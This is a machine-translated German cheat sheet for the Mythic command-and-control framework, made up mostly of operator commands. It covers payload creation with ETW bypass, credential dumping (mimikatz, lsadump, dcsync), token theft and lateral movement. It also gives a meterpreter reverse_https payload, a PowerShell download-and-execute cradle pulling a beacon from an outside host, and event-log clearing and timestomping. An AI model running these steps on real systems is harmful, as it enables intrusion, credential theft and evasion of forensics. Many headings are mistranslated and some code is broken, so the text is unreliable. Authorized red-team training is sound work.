Mythic C2 Framework Cheat Sheet
Überblick
Mythic ist ein moderner, plattformübergreifender Befehls- und Steuerungsrahmen (C2), der für rote Teamoperationen und adversäre Emulation konzipiert ist. Mythic bietet eine kollaborative Web-Schnittstelle, unterstützt mehrere Payload-Typen und bietet umfangreiche Anpassung durch seine agentenbasierte Architektur mit Unterstützung für mehrere Programmiersprachen.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation
Voraussetzungen
```bash
Install Docker and Docker Compose
curl -fsSL https://get.docker.com -o get-docker.sh sudo sh get-docker.sh sudo usermod -aG docker $USER
Install Docker Compose
sudo curl -L "https://github.com/docker/compose/releases/download/v2.20.0/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose sudo chmod +x /usr/local/bin/docker-compose
Verify installation
docker --version docker-compose --version ```_
Mythische Installation
```bash
Clone Mythic repository
git clone https://github.com/its-a-feature/Mythic.git cd Mythic
Make install script executable
chmod +x mythic-cli
Install Mythic
sudo ./mythic-cli install
Start Mythic services
sudo ./mythic-cli start
Check status
sudo ./mythic-cli status ```_
Quick Setup
```bash
One-liner installation
curl -sSL https://raw.githubusercontent.com/its-a-feature/Mythic/master/install.sh|bash
Access web interface
Navigate to https://localhost:7443
Default credentials will be displayed during installation
```_
Manuelle Docker Setup
```bash
Clone repository
git clone https://github.com/its-a-feature/Mythic.git cd Mythic
Build containers
docker-compose build
Start services
docker-compose up -d
View logs
docker-compose logs -f mythic_server ```_
Grundkonfiguration
Erster Setup
```bash
First-time configuration
- Navigate to https://localhost:7443
- Login with generated credentials
- Complete initial setup wizard
- Configure global settings
Change default passwords
sudo ./mythic-cli config set MYTHIC_ADMIN_PASSWORD newpassword sudo ./mythic-cli config set MYTHIC_SERVER_BIND_LOCALHOST_ONLY false
Restart services
sudo ./mythic-cli restart ```_
SSL Konfiguration
```bash
Generate SSL certificates
sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /path/to/cert.pem sudo ./mythic-cli config set MYTHIC_SERVER_KEY_PATH /path/to/key.pem
Use Let's Encrypt
certbot certonly --standalone -d your-domain.com sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /etc/letsencrypt/live/your-domain.com/fullchain.pem sudo ./mythic-cli config set MYTHIC_SERVER_KEY_PATH /etc/letsencrypt/live/your-domain.com/privkey.pem
Restart with new certificates
sudo ./mythic-cli restart ```_
Installation von Agenten
```bash
Install popular agents
sudo ./mythic-cli install github https://github.com/MythicAgents/apfell.git sudo ./mythic-cli install github https://github.com/MythicAgents/poseidon.git sudo ./mythic-cli install github https://github.com/MythicAgents/apollo.git sudo ./mythic-cli install github https://github.com/MythicAgents/merlin.git
List available agents
sudo ./mythic-cli list
Start specific agent
sudo ./mythic-cli start apfell ```_
Web Interface Navigation
Dashboard Übersicht
| | Section | Description | | | --- | --- | | | Operations | Manage operations and campaigns | | | | Payloads | Create and manage payload configurations | | | | Callbacks | Active agent connections | | | | Tasks | Command execution and task management | | | | Files | File management and downloads | | | | Credentials | Harvested credentials database | | | | Artifacts | IOCs and forensic artifacts | | | | Reporting | Generate operation reports | |
Betriebsleitung
```bash
Create new operation
- Navigate to Operations → Create
- Configure operation parameters:
- Name: Red Team Exercise 2024
- Description: Authorized penetration test
- Admin: [Your username]
- Complete: false
Operation settings
- Webhook URL: [Slack/Teams integration]
- OPSEC: Enable/disable certain commands
- Logging: Configure audit logging ```_
Erstellung von Nutzlasten
Apfell (macOS/Linux) Payload
```bash
Create Apfell payload
- Navigate to Payloads → Create
- Select Apfell agent
- Configure parameters:
- Payload Type: apfell
- C2 Profile: HTTP
- Callback Host: [Your IP/Domain]
- Callback Port: 80
- Callback Interval: 10
- Jitter: 23
Build options
- Output Format: bash, zsh, osascript, dylib
- Architecture: x64, arm64
- Obfuscation: Enable string obfuscation ```_
Poseidon (Cross-platform) Payload
```bash
Create Poseidon payload
- Navigate to Payloads → Create
- Select Poseidon agent
- Configure parameters:
- Payload Type: poseidon
- C2 Profile: HTTP
- Callback Host: [Your IP/Domain]
- Callback Port: 443
- User Agent: Mozilla/5.0...
- Sleep: 5
- Jitter: 10
Advanced options
- Proxy: Configure proxy settings
- Headers: Custom HTTP headers
- Encryption: AES encryption key ```_
Apollo (Windows) Payload
```bash
Create Apollo payload
- Navigate to Payloads → Create
- Select Apollo agent
- Configure parameters:
- Payload Type: apollo
- C2 Profile: HTTP
- Architecture: x64, x86
- Format: exe, dll, shellcode
- Callback Host: [Your IP/Domain]
- Callback Port: 8080
Windows-specific options
- PPID Spoofing: Enable parent process spoofing
- Block DLLs: Block non-Microsoft DLLs
- ETW Bypass: Enable ETW evasion ```_
C2 Profile
HTTP Profilkonfiguration
json
\\\\{
"name": "HTTP Profile",
"description": "Standard HTTP communication",
"parameters": \\\\{
"callback_host": "192.168.1.100",
"callback_port": 80,
"killdate": "2024-12-31",
"encrypted_exchange_check": true,
"callback_jitter": 23,
"callback_interval": 10,
"get_uri": "/api/v1/status",
"post_uri": "/api/v1/data",
"query_path_name": "q",
"proxy_host": "",
"proxy_port": "",
"proxy_user": "",
"proxy_pass": ""
\\\\}
\\\\}_
HTTPS Profilkonfiguration
json
\\\\{
"name": "HTTPS Profile",
"description": "Encrypted HTTPS communication",
"parameters": \\\\{
"callback_host": "secure.example.com",
"callback_port": 443,
"callback_interval": 30,
"callback_jitter": 15,
"encrypted_exchange_check": true,
"ssl_cert_path": "/path/to/cert.pem",
"ssl_key_path": "/path/to/key.pem",
"headers": [
\\\\{
"name": "User-Agent",
"value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
\\\\}
]
\\\\}
\\\\}_
WebSocket Profil
json
\\\\{
"name": "WebSocket Profile",
"description": "WebSocket-based communication",
"parameters": \\\\{
"callback_host": "ws.example.com",
"callback_port": 8080,
"endpoint": "/ws",
"user_agent": "Mozilla/5.0...",
"heartbeat_interval": 30
\\\\}
\\\\}_
Personalmanagement
Rückruf-Interaktion
```bash
Basic callback commands
help # Show available commands whoami # Get current user pwd # Current directory ls # List directory contents cd [path] # Change directory cat [file] # Read file download [file] # Download file upload [local] [remote] # Upload file shell [command] # Execute shell command ```_
Prozessmanagement
```bash
Process operations
ps # List processes kill [pid] # Kill process jobs # List background jobs jobkill [jid] # Kill background job
Process injection (Apollo)
inject [pid] [shellcode] # Inject shellcode shinject [pid] [file] # Inject shellcode from file dllload [dll] # Load DLL ```_
Einrichtende Operationen
```bash
Credential harvesting
mimikatz [command] # Execute Mimikatz logonpasswords # Dump logon passwords lsadump # Dump LSA secrets dcsync [user] # DCSync attack
Token manipulation
steal_token [pid] # Steal process token make_token [user] [pass] # Create token rev2self # Revert to self ```_
Spätere Bewegung
```bash
Remote execution
psexec [target] [command] # PSExec execution wmiexec [target] [command] # WMI execution smbexec [target] [command] # SMB execution
PowerShell remoting
invoke_command [target] [command] # PowerShell remoting enter_pssession [target] # Interactive PS session
SSH (Poseidon)
ssh [target] [user] [key] # SSH connection scp [source] [dest] # Secure copy ```_
Erweiterte Funktionen
SOCKEN Proxy
```bash
Start SOCKS proxy
socks [port] # Start SOCKS4/5 proxy socks_list # List active proxies socks_kill [id] # Kill SOCKS proxy
Use with external tools
proxychains -f /etc/proxychains.conf nmap -sT 192.168.1.0/24 ```_
Port Forwarding
```bash
Local port forwarding
portfwd [local_port] [remote_host] [remote_port]
Reverse port forwarding
rportfwd [remote_port] [local_host] [local_port]
List active forwards
portfwd_list
Kill port forward
portfwd_kill [id] ```_
Dateioperationen
```bash
File management
mkdir [directory] # Create directory rm [file] # Remove file mv [source] [dest] # Move file cp [source] [dest] # Copy file chmod [mode] [file] # Change permissions
Archive operations
zip [archive] [files] # Create zip archive unzip [archive] # Extract archive tar [options] [archive] # Tar operations ```_
Network Discovery
```bash
Network reconnaissance
portscan [target] [ports] # Port scanning ping [target] # ICMP ping traceroute [target] # Trace route arp # ARP table netstat # Network connections ifconfig # Network interfaces ```_
Automatisierung und Schrift
Aufgabenstellung
```python
Python automation script
import asyncio import mythic
async def automated_recon(callback_id): """Automated reconnaissance on new callback"""
# Basic system information
tasks = [
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an"
]
for task in tasks:
await mythic.issue_task(callback_id, task)
await asyncio.sleep(2)
# Credential harvesting if elevated
if await mythic.is_elevated(callback_id):
await mythic.issue_task(callback_id, "mimikatz logonpasswords")
await mythic.issue_task(callback_id, "lsadump")
Register automation
mythic.register_callback_automation(automated_recon) ```_
Webhook Integration
```python
Slack webhook integration
import requests import json
def send_slack_notification(callback_info): """Send Slack notification for new callbacks"""
webhook_url = "https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
message = \\\\{
"text": f"New Mythic Callback",
"attachments": [
\\\\{
"color": "good",
"fields": [
\\\\{"title": "Host", "value": callback_info['host'], "short": True\\\\},
\\\\{"title": "User", "value": callback_info['user'], "short": True\\\\},
\\\\{"title": "Agent", "value": callback_info['agent'], "short": True\\\\},
\\\\{"title": "IP", "value": callback_info['ip'], "short": True\\\\}
]
\\\\}
]
\\\\}
requests.post(webhook_url, data=json.dumps(message),
headers=\\\\{'Content-Type': 'application/json'\\\\})
Configure webhook in Mythic
mythic.set_webhook_callback(send_slack_notification) ```_
Batch Operationen
```bash
!/bin/bash
Batch callback management script
MYTHIC_URL="https://localhost:7443" API_TOKEN="your_api_token"
Function to execute command on all callbacks
execute_on_all() \\{ local command=$1
# Get all active callbacks
callbacks=$(curl -s -k -H "Authorization: Bearer $API_TOKEN" \
"$MYTHIC_URL/api/v1.4/callbacks"|jq -r '.callbacks[].id')
for callback_id in $callbacks; do
echo "[+] Executing '$command' on callback $callback_id"
curl -s -k -X POST \
-H "Authorization: Bearer $API_TOKEN" \
-H "Content-Type: application/json" \
-d "\\\\{\"command\": \"$command\"\\\\}" \
"$MYTHIC_URL/api/v1.4/callbacks/$callback_id/tasks"
sleep 1
done
\\}
Usage examples
execute_on_all "whoami" execute_on_all "ps" execute_on_all "netstat -an" ```_
Benutzerdefinierte Agenten
Struktur der Entwicklung
```python
Custom agent template
from mythic_payloadtype_container.MythicCommandBase import * from mythic_payloadtype_container.MythicRPC import *
class CustomAgent(PayloadType): name = "custom_agent" file_extension = "py" author = "@your_handle" supported_os = [SupportedOS.Windows, SupportedOS.Linux, SupportedOS.MacOS] wrapper = False wrapped_payloads = [] note = "Custom Python-based agent" supports_dynamic_loading = True
async def build(self) -> BuildResponse:
# Build logic here
resp = BuildResponse(status=BuildStatus.Success)
return resp
Command implementation
class WhoAmI(CommandBase): cmd = "whoami" needs_admin = False help_cmd = "Get current user information" description = "Execute whoami command" version = 1 author = "@your_handle"
async def create_tasking(self, task: MythicTask) -> MythicTask:
task.display_params = "whoami"
return task
async def process_response(self, response: AgentResponse):
pass
```_
Agent Communication
```go // Go agent communication example package main
import ( "bytes" "crypto/tls" "encoding/json" "net/http" "time" )
type Agent struct \\{ ID string Host string Port int Interval time.Duration Jitter int \\}
func (a *Agent) Checkin() error \\{ checkinData := map[string]interface\\{\\}\\{ "action": "checkin", "uuid": a.ID, "ips": getLocalIPs(), "os": getOSInfo(), "user": getCurrentUser(), "host": getHostname(), "pid": getPID(), "ppid": getPPID(), \\}
jsonData, _ := json.Marshal(checkinData)
tr := &http;.Transport\\\\{
TLSClientConfig: &tls;.Config\\\\{InsecureSkipVerify: true\\\\},
\\\\}
client := &http;.Client\\\\{Transport: tr\\\\}
resp, err := client.Post(
fmt.Sprintf("https://%s:%d/api/v1.4/agent_message", a.Host, a.Port),
"application/json",
bytes.NewBuffer(jsonData),
)
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
return nil
\\}
func (a *Agent) GetTasks() ([]Task, error) \\{ // Implementation for getting tasks return nil, nil \\}
func (a *Agent) SendResponse(taskID string, response string) error \\{ // Implementation for sending task responses return nil \\} ```_
Integration mit anderen Tools
Metasploit Integration
```bash
Use Mythic with Metasploit
Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
Upload via Mythic callback
upload meterpreter.exe /tmp/meterpreter.exe
Execute Metasploit payload
shell /tmp/meterpreter.exe
Handle in Metasploit
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 8443 run ```_
BlutHound Integration
```bash
Collect BloodHound data via Mythic
Upload SharpHound
upload SharpHound.exe /tmp/sharphound.exe
Run collection
shell /tmp/sharphound.exe -c All -d domain.local --zipfilename bloodhound.zip
Download results
download /tmp/bloodhound.zip
Import into BloodHound
neo4j start ./BloodHound --no-sandbox ```_
Cobalt Strike Integration
```bash
Beacon integration
Generate Cobalt Strike beacon
Use Mythic for initial access, pivot to Beacon
From Mythic callback
shell powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
Handle in Cobalt Strike team server
```_
Operationelle Sicherheit
Kommunikationssicherheit
```bash
Domain fronting configuration
Configure CDN (CloudFlare, AWS CloudFront)
Set up domain fronting rules
Update C2 profile with fronted domain
Certificate management
Use legitimate SSL certificates
Implement certificate pinning
Rotate certificates regularly
```_
Verkehrsanalyse Evanation
```bash
Malleable profiles
Mimic legitimate applications
Use common user agents
Implement realistic timing
Example profile mimicking Office 365
\\{ "name": "Office365", "user_agent": "Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.12026; Pro)", "get_uri": "/owa/auth/logon.aspx", "post_uri": "/owa/auth/owaauth.dll", "headers": [ \\{"name": "Accept", "value": "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8"\\}, \\{"name": "Accept-Language", "value": "en-US,en;q=0.5"\\}, \\{"name": "Accept-Encoding", "value": "gzip, deflate"\\} ] \\} ```_
Anti-Forensik
```bash
Event log clearing
shell wevtutil cl System shell wevtutil cl Security shell wevtutil cl Application
Timestomping
shell powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
Memory cleanup
Implement secure memory wiping
Use process migration
Clear command history
```_
Fehlerbehebung
Gemeinsame Themen
```bash
Callback not connecting
- Check firewall rules
- Verify C2 profile configuration
- Test network connectivity
- Check DNS resolution
SSL/TLS issues
Regenerate certificates
sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /new/path/cert.pem sudo ./mythic-cli restart
Container issues
Check Docker status
docker ps -a docker logs mythic_server
Restart services
sudo ./mythic-cli restart ```_
Debug Mode
```bash
Enable debug logging
sudo ./mythic-cli config set MYTHIC_DEBUG_LEVEL DEBUG sudo ./mythic-cli restart
View logs
sudo ./mythic-cli logs
Database issues
Access PostgreSQL
docker exec -it mythic_postgres psql -U mythic_user -d mythic_db
Reset database
sudo ./mythic-cli database reset ```_
Leistungsoptimierung
```bash
Optimize Docker resources
Increase memory allocation
sudo ./mythic-cli config set MYTHIC_DOCKER_MEMORY 4g
Optimize callback intervals
Increase sleep time for stealth
Reduce jitter for faster response
Database optimization
Regular database maintenance
Index optimization
Query performance tuning
```_
Best Practices
Betriebsplanung
- ** Voreinstellung*: Profile und Agenten vor dem Eingriff konfigurieren
- Teamkoordination: Einsatzbetriebsmanagement für Teamkooperation
- ** Kommunikationsprotokolle*: klare C2-Kommunikationskanäle einrichten
- Datenhandling: Implementierung sicherer Datenerfassung und Exfiltration
- *Cleanup-Verfahren: Plan zur Artefaktentfernung und Betriebsreinigung
Sicherheitsüberlegungen
```bash
Secure deployment
Use strong authentication
Enable HTTPS with valid certificates
Implement network segmentation
Regular security updates
Agent management
Use unique agent configurations
Implement kill dates
Regular agent rotation
Secure communication channels
```_
Dokumentation und Reporting
```bash
Operation documentation
Maintain detailed logs
Document all activities
Track compromised systems
Generate executive reports
Artifact tracking
Monitor IOCs
Document forensic artifacts
Implement attribution prevention
```_
Ressourcen
- Mythic GitHub Repository
- Mythische Dokumentation
- Mythic Agents Repository
- Mythic C2 Profiles
- [Red Team Village Mythic Training](__LINK_5___
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Mythic C2 Framework. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von roten Team-Operationen oder Penetrationstests haben. *